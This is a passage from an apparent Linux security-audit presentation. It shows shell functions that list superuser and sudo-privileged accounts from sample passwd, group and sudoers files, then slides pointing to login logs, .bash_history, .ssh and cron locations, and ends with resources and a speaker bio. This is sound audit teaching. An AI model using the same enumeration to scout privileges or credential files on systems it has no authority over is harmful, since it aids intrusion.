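%sudo ALL=(ALL:ALL) ALL
svc-backup ALL=(root) NOPASSWD: /usr/bin/rsync
EOF

# uid0_accounts PASSWD: every account whose UID (field 3) is 0
uid0_accounts() { awk -F: '$3 == 0 { print $1 }' "$1"; }

# extra_uid0 PASSWD: UID-0 accounts other than root; each is a second
# superuser the auditor must see authorized (exit status 1 when none)
extra_uid0() { uid0_accounts "$1" | grep -v '^root$'; }

# group_members GROUP_FILE NAME: comma-separated member list (field 4)
group_members() { awk -F: -v g="$2" '$1 == g { print $4 }' "$1"; }

# sudoers_specs SUDOERS: privilege lines only (no comments, blanks, Defaults)
sudoers_specs() {
    awk '/^[ \t]*#/ || /^[ \t]*$/ { next }
         $1 ~ /^Defaults/ { next }
         { print }' "$1"
}

# admin_users PASSWD GROUP_FILE SUDOERS: everyone with admin rights, i.e.
# UID-0 accounts, users named in sudoers and members of %groups in sudoers
admin_users() {
    {
        uid0_accounts "$1"
        sudoers_specs "$3" | awk '$1 !~ /^%/ { print $1 }'
        for g in $(sudoers_specs "$3" | awk '$1 ~ /^%/ { print substr($1, 2) }'); do
            group_members "$2" "$g" | tr ',' '\n'
        done
    } | grep -v '^$' | LC_ALL=C sort -u
}
admin_users "$SAMPLE/passwd" "$SAMPLE/group" "$SAMPLE/sudoers"
```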
  • 32. LINUX AUDIT - User login history
    • User, time, login durations: /var/log/wtmp (use the last command)
    • Other logs: /var/log/auth.log, /var/log/sudo.log
    • Commands: last, lastlog, w, who
  • 33. LINUX AUDIT – No place like $HOME
    • User files: /home/<user>, /root
    • Important user files: $HOME/.* (hidden files/directories start with “.”)
      • $HOME/.bash_history - command history
      • $HOME/.ssh – remote access information
  • 34. LINUX AUDIT – Daemons, services
    • Start-up scripts: /etc/inittab, /etc/init.d, /etc/rc.d, /etc/init.conf, /etc/init
    • Scheduled tasks: /etc/cron*, /var/spool/cron/*
    • Commands: ps -ef, ps aux
  • 35. RESOURCES TO LEARN LINUX
    GENERAL
    • LinuxCommand.org
    • The Linux System Administrator's Guide
    • GNU Operating System
    • More… 12 Resources to Learn Linux
    SECURITY AND AUDIT
    • SANS Pen Testing
    • LinuxSecurity.com
    • Linux-Audit.com
    • Linuxtopia.org
  • 37. ABOUT SPEAKER
    Gene Kartavtsev, CISA, PCIP
    Gene has 20 years of Information Technology experience, which includes IT audit, security, architecture, engineering and support. Prior to focusing on IT Governance, Risk and Compliance, Gene worked at several global financial services and media companies, including Bloomberg L.P. and Thomson Reuters, where he sharpened his skills in information systems engineering and architecture. He participated in thousands of complex IT implementations and was often involved in solving technology challenges vital to the success of the core business. In 2012, while working at JetBlue on a PCI controls implementation project, Gene discovered the interesting world of IT compliance. (Maybe insert something here about what you liked about IT compliance) Later, after moving from New York to Minnesota, Gene followed his passion for IT Risk Management and Compliance and has held several roles that have required a combination of technical expertise and knowledge of the latest IT regulations. Gene has rounded out his practical knowledge with CISA, PCIP, and ISA certifications. Gene recently joined Express Scripts, where he enjoys working with the challenges of applying multiple IT regulatory standards to many areas of large company operations. Other interests include spending time with the family, traveling and bicycle randonneuring – long-distance, unsupported, noncompetitive cycling within prescribed time limits.
    LinkedIn: https://www.linkedin.com/in/gkartavtsev
    Email: gkartavtsev@gmail.com